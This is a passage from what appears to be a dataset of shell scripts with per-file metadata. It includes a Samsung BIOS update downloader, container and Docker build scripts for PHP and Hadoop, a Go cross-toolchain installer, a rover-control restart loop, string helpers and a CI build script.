# PlatformID, print that file name on stdout, and return 2 when the response
# names no file.
request_file_by_platform_id(){
    local platform="$1"
    local url="http://sbuservice.samsungmobile.com/BUWebServiceProc.asmx/GetContents?platformID=$platform&PartNumber=AAAA"
    local response fname

    msg "Samsung PlatformID: $platform"
    info "Requesting $url"

    response="$(curl -f $url)"
    # Pull the <FilePathName> payload out of the XML and strip CRs/blanks.
    fname=$(echo "$response"|tr -d '\r'|sed -n "s/<FilePathName>\(.*\)<\/FilePathName>/\1/p"|tr -d '[[:blank:]]')

    if [ -z "$fname" ]; then
        info "No file given in response."
        return 2
    fi
    echo "$fname"
}
# Append one PlatformID (line-per-entry) to the caller's PlatformID_LIST,
# skipping values that are already present.
append_platformid_list(){
    local candidate="$1"

    if echo "$PlatformID_LIST"|grep "^$candidate$" >/dev/null; then
        debug "Skipping PlatformID: $candidate"
        return
    fi

    debug "Adding PlatformID: $candidate"
    PlatformID_LIST="$(printf "%s\n%s\n" "$PlatformID_LIST" "$candidate"|uniq)"
}
# Derive candidate Samsung PlatformIDs from the current BIOS version string
# and print them space-separated on stdout. Stats-based schemes are tried
# first (when the stats file exists), then a simple "second half of the
# version" fallback is always appended.
get_platformid_by_bios_version(){
    local PlatformID_LIST=
    # Platform ID is samsung specific magic. Seems like the only chance to get it is BIOS VERSION
    # We take only first word if there are any dots in BIOS version.
    BIOSVER=${current_bios_version%%.*}
    debug "Effective BIOS Version: $BIOSVER"
    BIOSVER_CHARS="$(echo "$BIOSVER"|awk '{print length($1)}')"
    debug "BIOS Version length: $BIOSVER_CHARS"
    if [ -f "$SAMSUNG_STATS" ]; then
        debug "We have Samsung PlatformID stats file. Using it."
        # Each stats row: count, platform-id chars, bios-version chars,
        # calc scheme, bios version, platform id. The heredoc below feeds
        # only rows matching this BIOS-version length with count > 6.
        while read count pchars bchars calc biosv platid; do
            info "Trying PlatformID calc scheme $pchars-$bchars-$calc"
            case $calc in
                normal)
                    # Take the last $pchars characters of the BIOS version.
                    PlatformID=$(echo "$BIOSVER"|sed "s/./&\n/g"|grep -v '^$'|tail -n $pchars|tr -d '\n')
                    ;;
                zerohack)
                    # Prefix a literal 0 and take one fewer trailing char.
                    PlatformID="0$(echo "$BIOSVER"|sed "s/./&\n/g"|grep -v '^$'|tail -n $((pchars-1))|tr -d '\n')"
                    ;;
                *)
                    PlatformID="$platid"
                    ;;
            esac
            #Adding stats-based IDs
            append_platformid_list "$PlatformID"
        done << STATS
$(awk -v b=$BIOSVER_CHARS '{if(($3==b)&&($1>6))print}' "$SAMSUNG_STATS")
STATS
#'
    else
        warning "Samsung PlatformID stats file is unaccessible. Please run samsung-platformid-stats to generate $SAMSUNG_STATS."
    fi
    # Adding simple method ID
    PlatformID=${BIOSVER:$((BIOSVER_CHARS/2))}
    append_platformid_list "$PlatformID"
    # Collapse the newline-separated list to a single space-separated line.
    echo "$(echo $PlatformID_LIST)"
}
# Locate and download the Samsung BIOS update package. PlatformIDs are taken
# from $samsung_platform_id or derived from the current BIOS version; the
# first ID for which the web service names a file wins.
get_bios_samsung(){
    if [ -z "$samsung_platform_id" ]; then
        if [ -z "$current_bios_version" ]; then
            current_bios_version=$(cat /sys/class/dmi/id/bios_version || sudo dmidecode -s bios-version)
        fi
        msg "Current BIOS Version: $current_bios_version"
        samsung_platform_id="$(get_platformid_by_bios_version $current_bios_version)"
    fi
    for PlatformID in $samsung_platform_id; do
        FILE=$(request_file_by_platform_id "$PlatformID"||true)
        if [ -n "$FILE" ]; then
            break
        fi
    done
    if [ -z "$FILE" ]; then
        doexit 5 "BIOS update package is not found. Sorry."
    fi
    msg "File to download: $FILE"
    FILE_URL="http://sbuservice.samsungmobile.com/upload/BIOSUpdateItem/$FILE"
    msg "URL: $FILE_URL"
    [ -d "$DOWNLOAD_DIR" ] || mkdir -p "$DOWNLOAD_DIR" || doexit 1 "Could not create $DOWNLOAD_DIR"
    if [ -f "$DOWNLOAD_DIR/$FILE" ] && [ -z "$force" ]; then
        warning "Already there: $DOWNLOAD_DIR/$FILE . Will not download unless --force is specified."
    else
        msg "Downloading $FILE"
        # BUG FIX: the old code ran `|| (echo ...; exit 2)`, whose exit only
        # ended the subshell, then hit a stray `break` outside any loop --
        # so failures were never fatal and "Download OK" printed regardless.
        if ! curl --progress-bar -o "$DOWNLOAD_DIR/$FILE" "$FILE_URL"; then
            doexit 2 "Download failed"
        fi
        msg "Download OK"
    fi
}
| true |
c43154e0e0be99b774429175f893501c0971afde | Shell | inri13666/azure-php-docker | /.build/init_container.sh | UTF-8 | 3,184 | 3.390625 | 3 | [] | no_license | #!/bin/bash
# setup server root
test ! -d "$HOME_SITE" && echo "INFO: $HOME_SITE not found. creating..." && mkdir -p "$HOME_SITE"

# An empty/unset WEBSITES_ENABLE_APP_SERVICE_STORAGE means we are not on
# Azure App Service. [ -z ... ] replaces the fragile `[ ! $VAR ]` form,
# which errors out when the value contains whitespace.
if [ -z "${WEBSITES_ENABLE_APP_SERVICE_STORAGE}" ]; then
    echo "INFO: NOT in Azure, chown for $HOME_SITE"
    chown -R nobody:nogroup "$HOME_SITE"
fi

# Default the Symfony environment and the composer home, then make sure the
# composer directory exists and is writable by the service user.
if [ -z "${SYMFONY_ENV}" ]; then
    export SYMFONY_ENV=${SYMFONY_ENV:-prod}
fi
if [ -z "${COMPOSER_HOME}" ]; then
    export COMPOSER_HOME=${HOME_SITE}/.composer
fi
if [ ! -d "${COMPOSER_HOME}" ]; then
    mkdir -p "$COMPOSER_HOME" && chown nobody:nogroup -R "${COMPOSER_HOME}"
fi

# Wire an optional user-supplied startup script into supervisor.
if [ -n "${STARTUP_SCRIPT}" ] && [ -f "${HOME_SITE}/${STARTUP_SCRIPT}" ]; then
    sed -i "s|command=.*|command=bash ${STARTUP_SCRIPT}|" /etc/supervisor/conf.d/06-startup.conf
    sed -i "s/autostart=.*/autostart=true/" /etc/supervisor/conf.d/06-startup.conf
fi
# Get environment variables to show up in SSH session
eval $(printenv | awk -F= '{print "export " $1"="$2 }' >> /etc/profile)
echo "Starting Container ..."
test ! -d /home/LogFiles && mkdir /home/LogFiles
test ! -f /home/LogFiles/nginx-access.log && touch /home/LogFiles/nginx-access.log
test ! -f /home/LogFiles/nginx-error.log && touch /home/LogFiles/nginx-error.log
test ! -f /home/LogFiles/php7.1-fpm.log && touch /home/LogFiles/php7.1-fpm.log
test ! -d /home/LogFiles/supervisor && mkdir /home/LogFiles/supervisor
chown -R nobody:nogroup /home/LogFiles
chown -R nobody:nogroup /run/php
sed -i "s|loglevel=.*|loglevel=${SUPERVISOR_LOG_LEVEL:-warn}|" /etc/supervisor/conf.d/00-supervisord.conf
rm -rf /var/log/supervisor
ln -s /home/LogFiles/supervisor /var/log/supervisor
phpenmod opcache
if [ -f "${HOME_SITE}/php.ini" ]; then
cat "${HOME_SITE}/php.ini" >> /etc/php/7.1/fpm/php.ini
fi
if [ -f "${HOME_SITE}/php-cli.ini" ]; then
cat "${HOME_SITE}/php-cli.ini" >> /etc/php/7.1/cli/php.ini
fi
if [ ${APPLICATION_INSTALLED:-0} == 1 ]; then
if [ -f "${HOME_SITE}/composer.json" ]; then
sed -i "s/autostart=.*/autostart=true/" /etc/supervisor/conf.d/05-composer.conf
fi
fi
echo 'opcache.memory_consumption=128' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.interned_strings_buffer=8' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.max_accelerated_files=4000' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.revalidate_freq=60' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.fast_shutdown=1' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.enable_cli=1' >> /etc/php/7.1/fpm/php.ini
echo 'opcache.memory_consumption=128' >> /etc/php/7.1/cli/php.ini
echo 'opcache.interned_strings_buffer=8' >> /etc/php/7.1/cli/php.ini
echo 'opcache.max_accelerated_files=4000' >> /etc/php/7.1/cli/php.ini
echo 'opcache.revalidate_freq=60' >> /etc/php/7.1/cli/php.ini
echo 'opcache.fast_shutdown=1' >> /etc/php/7.1/cli/php.ini
echo 'opcache.enable_cli=1' >> /etc/php/7.1/cli/php.ini
if [ ${DEBUG:-0} == 1 ]; then
ln -sf /dev/stdout /var/log/nginx/access.log
ln -sf /dev/stderr /var/log/nginx/error.log
ln -sf /dev/stderr /var/log/php7.1-fpm.log
else
ln -sf /home/LogFiles/nginx-access.log /var/log/nginx/access.log
ln -sf /home/LogFiles/nginx-error.log /var/log/nginx/error.log
ln -sf /home/LogFiles/php7.1-fpm.log /var/log/php7.1-fpm.log
fi
/usr/bin/supervisord
| true |
e01c4527c40585537cf62183120fdb49ac5e742b | Shell | limingyao/docker-files | /hadoop/generator_builder.sh | UTF-8 | 3,185 | 2.90625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Build the limingyao/hadoop2.7 image, serving ./soft over a temporary local
# HTTP server so the Dockerfile can wget the tarballs during the build.

if [ ! -f "./soft/hadoop-2.7.5.tar.gz" ]; then
    echo "./soft/hadoop-2.7.5.tar.gz not exist"
    echo "please download hadoop-2.7.5.tar.gz from https://www.apache.org/dyn/closer.cgi/hadoop/"
    exit 1
fi

port=15973
# NOTE(review): assumes exactly one broadcast-capable interface; ifconfig
# output format varies between distros -- verify on the build host.
ip=$(ifconfig -a | grep inet | grep broadcast | awk '{print $2}')

# BUGFIX: capture the server's PID directly via $! instead of grepping
# `ps`, which could match unrelated SimpleHTTPServer processes (and could
# return several PIDs). The trap guarantees the helper server is stopped
# even if the build fails part-way.
python -m SimpleHTTPServer "$port" >/dev/null 2>&1 &
pid=$!
trap 'kill "$pid" 2>/dev/null' EXIT

echo "ip: $ip"
echo "pid: $pid"

# Unquoted EOF: $ip/$port are expanded now; '\\' becomes a literal '\' line
# continuation in the generated Dockerfile.
cat > Dockerfile <<EOF
FROM limingyao/centos7-jdk8-base:latest
MAINTAINER mingyaoli@tencent.com
RUN mkdir -p /opt/hadoop && cd /opt/hadoop \\
    && wget http://$ip:$port/soft/hadoop-2.7.5.tar.gz \\
    && tar zxvf hadoop-2.7.5.tar.gz && rm hadoop-2.7.5.tar.gz \\
    && chown -R work.work /opt/hadoop/hadoop-*
RUN mkdir -p /opt/tez && cd /opt/tez \\
    && wget http://$ip:$port/soft/apache-tez-0.9.1-bin.tar.gz \\
    && tar zxvf apache-tez-0.9.1-bin.tar.gz && rm apache-tez-0.9.1-bin.tar.gz \\
    && mv /opt/tez/apache-tez-0.9.1-bin /opt/tez/tez-0.9.1 \\
    && rm -f /opt/tez/tez-0.9.1/lib/slf4j-* \\
    && cp /opt/hadoop/hadoop-2.7.5/share/hadoop/mapreduce/hadoop-mapreduce-client-co* /opt/tez/tez-0.9.1/lib/ \\
    && rm /opt/tez/tez-0.9.1/lib/hadoop-mapreduce-client-co*-2.7.0.jar \\
    && chown -R work.work /opt/tez/tez-*
RUN mkdir -p /opt/tomcat && cd /opt/tomcat \\
    && wget http://$ip:$port/soft/apache-tomcat-9.0.16.tar.gz \\
    && tar zxvf apache-tomcat-9.0.16.tar.gz && rm apache-tomcat-9.0.16.tar.gz \\
    && mv /opt/tomcat/apache-tomcat-9.0.16 /opt/tomcat/tomcat-9.0.16 \\
    && mkdir /opt/tomcat/tomcat-9.0.16/webapps/tez-ui \\
    && cp /opt/tez/tez-0.9.1/tez-ui-0.9.1.war /opt/tomcat/tomcat-9.0.16/webapps/tez-ui \\
    && cd /opt/tomcat/tomcat-9.0.16/webapps/tez-ui && unzip tez-ui-0.9.1.war && rm tez-ui-0.9.1.war \\
    && chown -R work.work /opt/tomcat/tomcat-*
RUN mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/core-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/core-site.xml.bak \\
    && mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/hdfs-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/hdfs-site.xml.bak \\
    && mv /opt/hadoop/hadoop-2.7.5/etc/hadoop/yarn-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/yarn-site.xml.bak \\
    && chmod -x /opt/hadoop/hadoop-*/bin/*.cmd && chmod -x /opt/hadoop/hadoop-*/sbin/*.cmd
ADD ./soft/conf/core-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/hdfs-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/mapred-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/yarn-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/conf/tez-site.xml /opt/hadoop/hadoop-2.7.5/etc/hadoop/
ADD ./soft/hadoop.sh /etc/profile.d/
RUN mkdir -p /data/hadoop && chown -R work.work /data/hadoop \\
    && chown work.work /etc/profile.d/hadoop.sh \\
    && chown work.work /opt/hadoop/hadoop-*/etc/hadoop/core-site.xml \\
    && chown work.work /opt/hadoop/hadoop-*/etc/hadoop/hdfs-site.xml \\
    && chown work.work /opt/hadoop/hadoop-*/etc/hadoop/mapred-site.xml \\
    && chown work.work /opt/hadoop/hadoop-*/etc/hadoop/yarn-site.xml \\
    && chown work.work /opt/hadoop/hadoop-*/etc/hadoop/tez-site.xml
EXPOSE 8020 8042 8088 19888 50070
EOF

# docker build --no-cache -t limingyao/hadoop2.7:latest .
docker build -t limingyao/hadoop2.7:latest .
| true |
44b71e205abcfa02e5b1c53d17b0ae6572aaa96e | Shell | open-policy-agent/opa | /build/ensure-linux-toolchain.sh | UTF-8 | 963 | 3.8125 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -eo pipefail

# Normalise the machine name reported by uname(1) and map it to a Go arch.
host_machine="$(uname -m | tr '[:upper:]' '[:lower:]')"
case "${host_machine}" in
    amd64 | x86_64 | x64)
        HOST_ARCH=amd64
        ;;
    arm64 | aarch64)
        HOST_ARCH=arm64
        ;;
    *)
        echo "Error: Host architecture not supported." >&2
        exit 1
        ;;
esac

# Native build: the plain system gcc is sufficient, nothing to print.
if [ "${GOARCH}" = "${HOST_ARCH}" ]; then
    if ! [ -x "$(command -v gcc)" ]; then
        echo "Error: gcc not found." >&2
        exit 1
    fi
    exit 0
fi

# Cross-compile: pick the Debian cross-toolchain package and compiler name
# for the requested Go target architecture.
if [ "${GOARCH}" = "amd64" ]; then
    PKG=gcc-x86-64-linux-gnu
    CC=x86_64-linux-gnu-gcc
elif [ "${GOARCH}" = "arm64" ]; then
    PKG=gcc-aarch64-linux-gnu
    CC=aarch64-linux-gnu-gcc
else
    echo "Error: Target architecture ${GOARCH} not supported." >&2
    exit 1
fi

# Already installed? `type` prints "<cc> is /path" on stdout -- callers
# consume this script's stdout, so that output is kept as-is.
if type -f ${CC} 2>/dev/null; then
    exit 0
fi

if ! [ -x "$(command -v apt-get)" ]; then
    echo "Error: apt-get not found. Could not install missing toolchain." >&2
    exit 1
fi

apt-get update >/dev/null && \
    apt-get install -y ${PKG} >/dev/null
echo "${CC}"
| true |
883360f65931046eb8ff83b75a46247e4cfccb84 | Shell | apiengine/apiengine-crusty | /bin/:string | UTF-8 | 401 | 3.5 | 4 | [] | no_license | #!/bin/sh
# Test whether string $1 begins with the literal prefix $2.
# Result is stored in the global variable __ ("true" / "false").
# BUGFIX: the original piped an unquoted 'echo $1' into grep, so the
# haystack was word-split/globbed and the prefix was treated as a BRE
# regex ('.' matched any character). A POSIX case pattern with a quoted
# "$2" matches both arguments literally and forks no processes.
string_startswith() {
  case "$1" in
    "$2"*) __="true" ;;
    *)     __="false" ;;
  esac
}
# Test whether string $1 ends with the literal suffix $2.
# Result is stored in the global variable __ ("true" / "false").
# BUGFIX: replaces the unquoted 'echo $1 | grep -q "$2$"' pipeline, which
# word-split the haystack and treated the suffix as a regex; the case
# pattern matches literally and needs no subprocesses.
string_endswith() {
  case "$1" in
    *"$2") __="true" ;;
    *)     __="false" ;;
  esac
}
# Test whether string $1 contains the literal substring $2.
# Result is stored in the global variable __ ("true" / "false").
# BUGFIX: replaces the unquoted 'echo $1 | grep -q "$2"' pipeline, which
# word-split the haystack and treated the needle as a regex; the case
# pattern matches literally and needs no subprocesses.
string_contains() {
  case "$1" in
    *"$2"*) __="true" ;;
    *)      __="false" ;;
  esac
}
| true |
73114f539c94d398f9d9220d946b864a01326edb | Shell | joehou45/chestnut-picker | /bin/autoStartRoverControl.sh | UTF-8 | 370 | 2.75 | 3 | [] | no_license | #!/bin/bash
# Supervisor loop: (re)start rover_control.py forever, logging each attempt.
export DISPLAY=:0
export LOGFILE=/home/nvidia/autoStartRoverControl.log

# BUGFIX: the original did not check 'cd', so a missing project directory
# meant looping forever running python3 from the wrong working directory.
cd /home/nvidia/chestnut-picker || { echo "cannot cd to /home/nvidia/chestnut-picker" >> "$LOGFILE"; exit 1; }

while :; do
	{
		echo
		echo "----------------------------------------------"
		date
	} >> "$LOGFILE"
	# Run the controller unbuffered, capturing stdout+stderr. If it ever
	# exits, record the event and restart after a short pause.
	python3 -u rover_control.py >> "$LOGFILE" 2>&1
	echo "something wrong with rover_control.py" >> "$LOGFILE"
	date >> "$LOGFILE"
	sleep 1
done
| true |
d2731e0166d42692d99729279fda68aa4befc514 | Shell | iwko/bigflow | /build-and-release/build.sh | UTF-8 | 933 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# CI build script: install deps, release version on master, run `bf build`,
# and record version/workflow metadata for later deployment stages.
# Args: $1 = git remote URL (required), $2 = start time, $3 = workflow id.
set -e

pip install -r resources/requirements.txt

if [ -z "${1:-}" ]; then
  echo "usage: $0 <git-remote-url> [start-time] [workflow-id]" >&2
  exit 1
fi
git remote set-url origin "$1"

python -c 'import bamboo_build;bamboo_build.release_version_if_on_master()'
releaseVersion=$(python -c 'import bamboo_build;bamboo_build.get_bamboo_release_version()')

# Optional flags forwarded to `bf build`.
args_array=()
if [ -n "${2:-}" ]; then
  args_array+=("--start-time" "$2")
fi
workflow_id=""
if [ -n "${3:-}" ]; then
  workflow_id="$3"
  args_array+=("--workflow" "$workflow_id")
fi

echo "bf build ${args_array[*]}"
bf build "${args_array[@]}"

# Newer bigflow emits hidden output dirs; fall back to the legacy names.
if [ -d ".image" ]; then image_dir=".image"; else image_dir="image"; fi
if [ -d ".dags" ]; then dags_dir=".dags"; else dags_dir="dags"; fi

pip freeze | grep '^bigflow' | sed 's/bigflow==//' > "$image_dir/bigflow_version.txt"

echo "version=$releaseVersion" > variables.txt

if [ -n "$workflow_id" ]; then
  # TODO: Remove after such logic (generate metadata about builded dags) is integrated into `bigflow`.
  echo "$workflow_id" >> "$dags_dir/workflow_id.txt"
fi
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.